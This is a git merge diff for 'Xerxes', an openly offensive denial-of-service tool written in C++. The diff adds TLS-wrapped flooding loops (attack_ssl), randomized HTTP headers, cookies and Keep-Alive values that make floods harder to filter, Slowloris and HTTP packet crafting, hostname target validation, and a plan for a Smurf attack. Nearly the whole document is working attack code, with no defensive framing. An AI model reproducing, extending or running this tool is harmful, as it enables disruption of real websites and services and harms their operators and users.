Merge pull request #2 from sepehrdaddev/experimental

Experimental

CMakeLists.txt

@@ -4,5 +4,13 @@ project(Xerxes)
 
 set(CMAKE_CXX_STANDARD 11)
 
+find_package(PkgConfig REQUIRED)
+pkg_search_module(OPENSSL REQUIRED openssl)
+if( OPENSSL_FOUND )
+    include_directories(${OPENSSL_INCLUDE_DIRS})
+    message(STATUS "Using OpenSSL ${OPENSSL_VERSION}")
+endif()
+
 add_executable(Xerxes main.cpp Configuration.h Doser.cpp Doser.h Validator.cpp Validator.h Parser.cpp Parser.h Logger.cpp Logger.h)
+target_link_libraries(Xerxes ${OPENSSL_LIBRARIES})
 add_custom_command(TARGET Xerxes POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy ${CMAKE_SOURCE_DIR}/useragents ${CMAKE_CURRENT_BINARY_DIR}/useragents)

Configuration.h

@@ -17,6 +17,7 @@ struct config{
     bool GetResponse{false};
     bool RandomizeUserAgent{false};
     bool RandomizeHeader{false};
+    bool UseSSL{false};
 
 };
 

Doser.cpp

@@ -6,12 +6,13 @@
 #include <utility>
 #include <unistd.h>
 #include <iostream>
+#include <algorithm>
 #include "Doser.h"
 
 
 void Doser::attack(const int *id){
-    std::vector<int> sockets;
     int x, r;
+    std::vector<int> sockets;
     std::vector<bool> packets;
     for (x = 0; x < conf->CONNECTIONS; x++) {
         sockets.push_back(0);
@@ -32,7 +33,6 @@ void Doser::attack(const int *id){
                 r = write_socket(sockets[x], packet.c_str(), static_cast<int>(packet.length()));
                 packets[x] = true;
             }
-
             if(conf->GetResponse){
                 read_socket(sockets[x]);
             }
@@ -59,6 +59,64 @@ void Doser::attack(const int *id){
     }
 }
 
+void Doser::attack_ssl(const int *id){
+    int x, r;
+    std::vector<int> sockets;
+    std::vector<bool> packets;
+    std::vector<SSL_CTX *> CTXs;
+    std::vector<SSL *> SSLs;
+    for (x = 0; x < conf->CONNECTIONS; x++) {
+        sockets.push_back(0);
+        packets.push_back(false);
+        SSLs.push_back(nullptr);
+        CTXs.push_back(nullptr);
+    }
+    signal(SIGPIPE, &Doser::broke);
+    while(true) {
+        static std::string message;
+        for (x = 0; x < conf->CONNECTIONS; x++) {
+            if(!sockets[x]){
+                sockets[x] = make_socket(conf->website.c_str(), conf->port.c_str());
+                CTXs[x] = InitCTX();
+                SSLs[x] = Apply_SSL(sockets[x], CTXs[x]);
+                packets[x] = false;
+            }
+            if(conf->vector == config::NullTCP | conf->vector == config::NullUDP){
+                r = write_socket(SSLs[x], "\0", 1);
+            }else{
+                std::string packet = craft_packet(packets[x]);
+                r = write_socket(SSLs[x], packet.c_str(), static_cast<int>(packet.length()));
+                packets[x] = true;
+            }
+            if(conf->GetResponse){
+                read_socket(SSLs[x]);
+            }
+            if(r == -1){
+                SSL_free(SSLs[x]);
+                close(sockets[x]);
+                SSL_CTX_free(CTXs[x]);
+                sockets[x] = make_socket(conf->website.c_str(), conf->port.c_str());
+                CTXs[x] = InitCTX();
+                SSLs[x] = Apply_SSL(sockets[x], CTXs[x]);
+                packets[x] = false;
+            }else{
+                message = std::string("Socket[") + std::to_string(x) + "->"
+                          + std::to_string(sockets[x]) + "] -> " + std::to_string(r);
+                logger->Log(&message, Logger::Info);
+                message = std::to_string(*id) + ": Voly Sent";
+                logger->Log(&message, Logger::Info);
+            }
+        }
+        message = std::to_string(*id) + ": Voly Sent";
+        logger->Log(&message, Logger::Info);
+        if(conf->vector == config::Slowloris){
+            usleep(10000000);
+        }else{
+            usleep(30000);
+        }
+    }
+}
+
 int Doser::make_socket(const char *host, const char *port) {
     struct addrinfo hints{}, *servinfo, *p;
     int sock = 0, r;
@@ -146,14 +204,26 @@ void Doser::run() {
             break;
         default:break;
     }
-
+    if(conf->UseSSL){
+        logger->Log("SSL Enabled", Logger::Info);
+    }
+    if(conf->RandomizeHeader){
+        logger->Log("Header Randomization Enabled", Logger::Info);
+    }
+    if(conf->RandomizeUserAgent){
+        logger->Log("Useragent Randomization Enabled", Logger::Info);
+    }
     logger->Log("Press <Ctrl+C> to stop\n", Logger::Info);
     usleep(1000000);
     for (int x = 0; x < conf->THREADS; x++) {
         switch (fork()){
             case 0:break;
             default:
-                attack(&x);
+                if(conf->UseSSL){
+                    attack_ssl(&x);
+                }else{
+                    attack(&x);
+                }
         }
         usleep(200000);
     }
@@ -177,18 +247,32 @@ void Doser::read_socket(int socket){
     }
 }
 
+void Doser::read_socket(SSL *ssl) {
+    char chunk[128];
+    while(SSL_read(ssl , chunk, 128)){
+        memset(chunk , 0 , 128);
+    }
+}
+
 int Doser::write_socket(int socket, const char *string, int length){
     return static_cast<int>(write(socket, string, static_cast<size_t>(length)));
 }
+int Doser::write_socket(SSL *ssl, const char* string, int length){
+    return (SSL_write(ssl, string, length));
+}
 
 std::string Doser::craft_packet(bool keep_alive){
     std::string packet{};
+    shuffle(std::begin(encoding), std::end(encoding), std::mt19937(std::random_device()()));
+    shuffle(std::begin(caching), std::end(caching), std::mt19937(std::random_device()()));
+    shuffle(std::begin(charset), std::end(charset), std::mt19937(std::random_device()()));
+    shuffle(std::begin(contenttype), std::end(contenttype), std::mt19937(std::random_device()()));
     switch(conf->vector){
         case config::UDPFlood:
         case config::TCPFlood:
             return createStr();
         case config::HTTP:{
-            packet += "GET /";
+           packet += "GET /";
             if(conf->RandomizeHeader){
                 packet += createStr();
             }
@@ -198,14 +282,21 @@ std::string Doser::craft_packet(bool keep_alive){
             }else{
                 packet += conf->useragents[0];
             }
-            packet+= " \r\nAccept: */*\r\nConnection: Keep-Alive\r\n\r\n";
+            packet += " \r\nCache-Control: " + caching[0]
+                      + " \r\nAccept-Encoding: " + encoding[0]
+                      + " \r\nAccept-Charset: " + charset[0] + ", " + charset[1]
+                      + " \r\nAccept: */*\r\nConnection: Keep-Alive"
+                      + " \r\nContent-Type: " + contenttype[0]
+                      + " \r\nCookie: " + createStr() + "=" + createStr()
+                      + " \r\nKeep-Alive: " + std::to_string(randomInt(1, 5000))
+                      + "\r\n\r\n";
             return packet;
         }
         case config::Slowloris:{
             if(keep_alive){
-                packet += "X-a: ";
-                packet += std::to_string(randomInt(1, 5000));
-                packet += " \r\n";
+                packet += "X-a: "
+                          + std::to_string(randomInt(1, 5000))
+                          + " \r\n";
             }else{
                 packet += "GET /";
                 if(conf->RandomizeHeader){
@@ -217,10 +308,13 @@ std::string Doser::craft_packet(bool keep_alive){
                 }else{
                     packet += conf->useragents[0];
                 }
-                packet+= " \r\nAccept: */*\r\n";
-                packet += "X-a: ";
-                packet += std::to_string(randomInt(1, 5000));
-                packet += " \r\n";
+                packet += " \r\nCache-Control: " + caching[0]
+                          + " \r\nAccept-Encoding: " + encoding[0]
+                          + " \r\nAccept-Charset: " + charset[0] + ", " + charset[1]
+                          + " \r\nContent-Type: " + contenttype[0]
+                          + " \r\nCookie: " + createStr() + "=" + createStr()
+                          + " \r\nAccept: */*\r\n"
+                          + "X-a: " + std::to_string(randomInt(1, 5000)) + " \r\n";
             }
             return packet;
         }
@@ -235,3 +329,26 @@ int Doser::randomInt(int min, int max){
     std::uniform_int_distribution<int> distribution(min, max);
     return distribution(engine);
 }
+
+SSL_CTX *Doser::InitCTX() {
+    const SSL_METHOD *method{SSLv3_client_method()};
+    SSL_CTX *ctx;
+    OpenSSL_add_ssl_algorithms();
+    SSL_load_error_strings();
+    ctx = SSL_CTX_new(method);
+    if (ctx == nullptr){
+        logger->Log("Unable to connect using ssl", Logger::Error);
+        exit(EXIT_FAILURE);
+    }
+    return ctx;
+}
+
+SSL *Doser::Apply_SSL(int socket, SSL_CTX *ctx){
+    SSL *ssl = SSL_new(ctx);
+    SSL_set_fd(ssl, socket);
+    if(SSL_connect(ssl) == -1){
+        logger->Log("Unable to connect using ssl", Logger::Error);
+        exit(EXIT_FAILURE);
+    }
+    return ssl;
+}

Doser.h

@@ -3,6 +3,8 @@
 
 
 #include <array>
+#include <openssl/ssl.h>
+#include <openssl/err.h>
 #include "Configuration.h"
 #include "Logger.h"
 
@@ -14,15 +16,24 @@ class Doser {
 private:
     int make_socket(const char *host, const char *port);
     void read_socket(int socket);
+    void read_socket(SSL *ssl);
     int write_socket(int socket, const char* string, int length);
+    int write_socket(SSL *ssl, const char* string, int length);
     std::string craft_packet(bool keep_alive=false);
     static void broke(int);
     std::string createStr();
     int randomInt(int min, int max);
     void attack(const int *id);
+    void attack_ssl(const int *id);
     std::string randomizeUserAgent();
+    SSL_CTX* InitCTX();
+    SSL *Apply_SSL(int socket, SSL_CTX *ctx);
     config *conf;
     Logger *logger;
+    std::vector<std::string> encoding{"\'\'", "*", "identity", "gzip", "deflate"};
+    std::vector<std::string> caching{"no-cache", "max-age=0"};
+    std::vector<std::string> charset{"ISO-8859-1", "utf-8", "Windows-1251", "ISO-8859-2", "ISO-8859-15"};
+    std::vector<std::string> contenttype{"multipart/form-data", "application/x-url-encoded"};
 
 };
 

Parser.cpp

@@ -12,6 +12,7 @@ void Parser::help() {
                                 "                -ft              set attack vector to TCPFlood\n"
                                 "                -fu              set attack vector to UDPFlood\n"
                                 "                -s               set attack vector to Slowloris\n"
+                                "                -ss              enable SSL\n"
                                 "                -w               wait for hosts response\n"
                                 "                -rh              randomize HTTP Header\n"
                                 "                -ru              randomize HTTP UserAgent\n"
@@ -25,7 +26,7 @@ void Parser::help() {
 }
 
 void Parser::show_banner() {
-    const std::string version{"v0.0.3"};
+    const std::string version{"v0.0.4"};
     std::cout << "Xerxes - Revised " << version << std::endl;
 }
 
@@ -69,8 +70,12 @@ void Parser::parse_commandline(const int *argc, const char *argv[]) {
                             conf->GetResponse = true;
                             break;
                         case 's':
-                            conf->vector = config::Slowloris;
-                            conf->protocol = config::TCP;
+                            if(argv[i][2] == 's'){
+                                conf->UseSSL = true;
+                            }else{
+                                conf->vector = config::Slowloris;
+                                conf->protocol = config::TCP;
+                            }
                             break;
                         case 'q':
                             if(argv[i][2] == 'q'){
@@ -79,6 +84,13 @@ void Parser::parse_commandline(const int *argc, const char *argv[]) {
                                 logger->setLevel(Logger::Error);
                             }
                             break;
+                        case 'v':
+                            if(argv[i][2] == 'v'){
+                                logger->setLevel(Logger::Info);
+                            }else{
+                                logger->setLevel(Logger::Warning);
+                            }
+                            break;
                         default:
                             help();
                     }

README.md

@@ -14,6 +14,7 @@ Options:\
      -ft     set attack vector to TCPFlood\
      -fu     set attack vector to UDPFlood\
      -s      set attack vector to Slowloris\
+     -ss     enable SSL\
      -w      wait for hosts response\
      -rh     randomize HTTP Header\
      -ru     randomize HTTP UserAgent\
@@ -25,8 +26,7 @@ Options:\
 ## Todo
 <ul>
     <li>Add spoofed ICMP packets support</li>
-    <li>Add more randomization to http header</li>
-    <li>Add https support</li>
+    <li>Add Smurf Attack vector</li>
     <li>Add more attack vectors</li>
 </ul>
 

Validator.cpp

@@ -1,6 +1,7 @@
 #include "Validator.h"
 #include <netinet/in.h>
 #include <arpa/inet.h>
+#include <netdb.h>
 
 Validator::Validator() = default;
 
@@ -10,8 +11,7 @@ Validator::Validator(const config *conf) : conf{conf} {
 
 bool Validator::isValidWebsite(){
     struct sockaddr_in sa{};
-    int result = inet_pton(AF_INET, conf->website.c_str(), &(sa.sin_addr));
-    return static_cast<bool>(result);
+    return (inet_pton(AF_INET, conf->website.c_str(), &(sa.sin_addr))) || isValidHostname();
 }
 
 bool Validator::isValidPort() {
@@ -31,3 +31,8 @@ bool Validator::isValidConfig() {
 bool Validator::Validate() {
     return (isValidConfig() & isValidWebsite() & isValidPort());
 }
+
+bool Validator::isValidHostname(){
+    hostent *record = gethostbyname(conf->website.c_str());
+    return record != nullptr;
+}

Validator.h

@@ -15,6 +15,7 @@ class Validator {
     bool isValidWebsite();
     bool isValidPort();
     bool isValidConfig();
+    bool isValidHostname();
 };